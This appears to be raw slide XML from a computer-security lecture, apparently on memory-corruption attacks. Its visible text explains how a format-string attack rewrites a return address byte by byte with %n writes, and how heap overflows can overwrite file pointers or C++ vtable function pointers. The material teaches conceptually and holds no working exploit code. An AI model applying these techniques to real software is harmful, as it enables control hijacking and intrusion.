            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln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n-US" sz="1600" dirty="0"/>
              <a:t>C has a concise way of printing multiple symbols: %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Mx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> will print exactly 4M bytes (taking them from the stack).  Attack string should contain enough “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Mx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” so that the number of characters printed is equal to the most significant byte of the address of the attack code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Repeat three times (four “%n” in total) to write into &amp;RET+1, &amp;RET+2, &amp;RET+3, thus replacing RET with the address of the attack code byte by byte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1480724" name="AutoShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15C3CAD-5D40-8145-93C4-6A70D710D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419" y="1795444"/>
            <a:ext cx="1750800" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1273"/>
              <a:gd name="adj2" fmla="val 132074"/>
            </a:avLst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 type="none" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"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400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This portion contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>enough % symbols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to advance printf’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>internal stack pointer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8A412D3-0205-0940-9418-0F0E45BD470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863851" y="4637668"/>
            <a:ext cx="1" cy="37089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717C6B70-4C77-0D4A-9276-D423EA813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%n to Write the Return Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 8" descr="Large checker board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7303E3-8FB6-4840-BDC6-7AC3120DC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2214" y="3092448"/>
            <a:ext cx="838200" cy="6858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 algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="lg" len="lg"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&amp;RET+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C953C792-6799-D541-8DBA-28787FE0452E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6405564" y="2954339"/>
            <a:ext cx="1749425" cy="309537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 958"/>
              <a:gd name="T1" fmla="*/ 192 h 252"/>
              <a:gd name="T2" fmla="*/ 45638517 w 958"/>
              <a:gd name="T3" fmla="*/ 0 h 252"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 958"/>
              <a:gd name="T5" fmla="*/ 1 h 252"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 958"/>
              <a:gd name="T7" fmla="*/ 252 h 252"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 958"/>
              <a:gd name="T13" fmla="*/ 0 h 252"/>
              <a:gd name="T14" fmla="*/ 958 w 958"/>
              <a:gd name="T15" fmla="*/ 252 h 2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58" h="252">
                <a:moveTo>
                  <a:pt x="0" y="192"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="958" y="252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5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0719" grpId="0" animBg="1"/>
      <p:bldP spid="11282" grpId="0" animBg="1"/>
      <p:bldP spid="1480724" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8923A7-0CD0-7D40-899E-524F088218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Heap Overflow</a:t>
            </a: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ED2A53EF-9D1B-964A-83EF-DCED4119E7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dirty="0"/>
              <a:t>Overflowing heap memory can change important pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>File pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>replace a filename pointer with a pointer into a memory location containing the name of a system file (instead of a temporary file, write into AUTOEXEC.BAT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Function pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any memory write where the attacker controls the value and the destination can lead to control hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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6CB1E5-F5D3-3E43-A3CD-4F46B60211F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5275755" y="5176215"/>
            <a:ext cx="783000" cy="930240"/>
            <a:chOff x="5275755" y="5176215"/>
            <a:chExt cx="783000" cy="93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1CCFCAA-4F80-884C-9384-B71965737D81}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5524875" y="5176215"/>
                <a:ext cx="332640" cy="930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1CCFCAA-4F80-884C-9384-B71965737D8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61875" y="5113575"/>
                  <a:ext cx="458280" cy="10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B1307BD-3010-9E41-8C86-9826F105A519}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5275755" y="5223015"/>
                <a:ext cx="227880" cy="288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B1307BD-3010-9E41-8C86-9826F105A5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13115" y="5160375"/>
                  <a:ext cx="3535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07B80C9-EF14-B443-8A33-F4BD6D4B59C0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5542875" y="5186655"/>
                <a:ext cx="515880" cy="343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07B80C9-EF14-B443-8A33-F4BD6D4B59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80235" y="5123655"/>
                  <a:ext cx="641520" cy="468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79251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0A2F41-BA6A-E64D-9378-59B97DB363DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329112" y="4919665"/>
            <a:ext cx="10668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sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vtable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3251" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8F4616-93CA-1C4F-9768-BFAF4B3C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Function Pointers on the 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A182E-F708-C546-BBEE-70712A179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612" y="1922647"/>
            <a:ext cx="8229600" cy="1037165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Compiler-generated function pointers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 dirty="0"/>
              <a:t>(e.g., virtual method table in C++ or JavaScript code)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4BFA5A-90D0-2743-BD5C-9392E60950F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7986712" y="4931333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buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr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0053E98-53D9-034C-820C-CA9733A8ED1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119312" y="4919665"/>
            <a:ext cx="1905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sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[256]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31D496-49AE-9546-828A-484A8B6F88D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367712" y="4930778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BE6B6A4-E196-504C-A4CF-B703B67B84B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748712" y="4931333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buFontTx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DEECD5B-206B-F340-8351-80AE18CBDFE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9129712" y="4930778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Left Brace 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB7C913-6C5E-0F47-B8D7-2246E4507C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8672512" y="5083178"/>
            <a:ext cx="152400" cy="16764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08B623-321D-8640-9E12-23C948956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5313" y="5921378"/>
            <a:ext cx="12186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  <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>object T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6B7F903-D532-8149-870A-8357D1DEF759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662112" y="4919665"/>
            <a:ext cx="8382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723CB48-4B0D-D946-9BA8-6C8E55067DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738312" y="5756279"/>
            <a:ext cx="838200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64A2933-8027-034C-8C25-CB6D7718FBF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4291013" y="5338766"/>
            <a:ext cx="83820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B230D5E-8F07-1C4F-B5CD-EA930998B21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4595019" y="5337972"/>
            <a:ext cx="83820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CCDBAE6-30D4-E740-9F37-6ED5EF24864F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7986712" y="4930778"/>
            <a:ext cx="1524000" cy="8382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F347FE3-7314-F941-8848-A29E3AAF79FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329112" y="4919665"/>
            <a:ext cx="1066800" cy="8382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8EECBBC-B91B-DC4C-9C7E-C77CD0855859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7948613" y="5948366"/>
            <a:ext cx="381000" cy="3175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E26D9FA-3C67-324F-8001-A27F78D46403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4481512" y="6138865"/>
            <a:ext cx="3657600" cy="1588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832E925-24E8-704B-9482-60988CD79B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4291013" y="5948366"/>
            <a:ext cx="381000" cy="3175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86F6B3D-CED9-F54E-925B-CA126DC49C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163860" y="3643052"/>
            <a:ext cx="22235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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Suppose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> is on the heap next to a string object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2F97E6F-936F-1646-9124-75124CE04FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4443413" y="5491166"/>
            <a:ext cx="83820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6A47C8F-F7EF-7141-920F-D731FE540809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4747419" y="5490372"/>
            <a:ext cx="83820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6B8D1C17-D396-D346-9F4E-3250014EC79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="3497802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FP1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86A4501-9C1E-E649-933E-4CAFD5313A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="3802602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FP2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EAE47D-8AF9-8C4D-839C-5730407738DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="4107402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FP3</a:t>
            </a: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4CBD67C0-F24D-6D47-A756-307BFDEF9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9404" y="3021492"/>
            <a:ext cx="7665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 dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vtable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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B6FC0C6-A6DC-6241-99D8-E060B60755BC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5216251" y="3530069"/>
            <a:ext cx="990601" cy="1201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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{033C8C13-54BB-4749-AA4F-85650A85B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6852" y="3345403"/>
            <a:ext cx="12266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method #1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9C3FF32-A46B-7B4C-A60E-EFF6B8660DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="3"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5216251" y="3941232"/>
            <a:ext cx="990601" cy="137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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92B881C1-7DD2-F947-B438-5E2C80B4F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6852" y="3756566"/>
            <a:ext cx="12634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method #2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C885E5B-602E-6944-B611-FB1C54AC4B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="44" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216251" y="4242340"/>
            <a:ext cx="990601" cy="1259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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9412F174-D9B3-504D-A823-770A624B1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6852" y="4183603"/>
            <a:ext cx="12634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method #3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320908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3" grpId="0"/>
      <p:bldP spid="80" grpId="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" animBg="1"/>
      <p:bldP spid="4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240A2F41-BA6A-E64D-9378-59B97DB363DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329112" y="4919665"/>
            <a:ext cx="10668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sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vtable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3251" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8F4616-93CA-1C4F-9768-BFAF4B3C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Heap-Based Control Hijacking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BE722D-2A5C-4D42-834B-78B16C1B8F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="3497802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FP1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C6E5AF-C8C6-A24B-9D13-674BD5BF6DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="3802602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FP2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6C63D9-15C9-FA45-BBDD-0A36DDAD841E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378051" y="4107402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FP3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53262" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95425692-5F3C-B442-99FE-D4FE2D627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9404" y="3021492"/>
            <a:ext cx="7665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 dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vtable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="18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9F8068-6C38-E745-BA5C-447458B0760C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="53264" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5216251" y="3530069"/>
            <a:ext cx="990601" cy="1201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64" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF42A177-521A-B44F-BCE5-53A93DC23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6852" y="3345403"/>
            <a:ext cx="12266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method #1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EE9EDBD-522D-AD4A-80D0-70E65873844A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="53266" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5216251" y="3941232"/>
            <a:ext cx="990601" cy="137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66" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C117ECB9-FCCA-6541-812C-6379D20BA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6852" y="3756566"/>
            <a:ext cx="12634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method #2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CE9C63-7A9B-A749-8B95-01A246A415BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="53268" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216251" y="4242340"/>
            <a:ext cx="990601" cy="1259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68" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB7C2D2-98A0-6642-8F8F-B58BA003C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6852" y="4183603"/>
            <a:ext cx="12634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method #3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4BFA5A-90D0-2743-BD5C-9392E60950F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7986712" y="4931333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buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr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0053E98-53D9-034C-820C-CA9733A8ED1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119312" y="4919665"/>
            <a:ext cx="1905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sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[256]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31D496-49AE-9546-828A-484A8B6F88D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367712" y="4930778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BE6B6A4-E196-504C-A4CF-B703B67B84B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748712" y="4931333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buFontTx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DEECD5B-206B-F340-8351-80AE18CBDFE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9129712" y="4930778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Left Brace 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB7C913-6C5E-0F47-B8D7-2246E4507C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8672512" y="5083178"/>
            <a:ext cx="152400" cy="16764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08B623-321D-8640-9E12-23C948956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5313" y="5921378"/>
            <a:ext cx="12186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  <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>object T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6B7F903-D532-8149-870A-8357D1DEF759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662112" y="4919665"/>
            <a:ext cx="8382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723CB48-4B0D-D946-9BA8-6C8E55067DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738312" y="5756279"/>
            <a:ext cx="838200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64A2933-8027-034C-8C25-CB6D7718FBF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4291013" y="5338766"/>
            <a:ext cx="83820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B230D5E-8F07-1C4F-B5CD-EA930998B21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4595019" y="5337972"/>
            <a:ext cx="83820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CCDBAE6-30D4-E740-9F37-6ED5EF24864F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
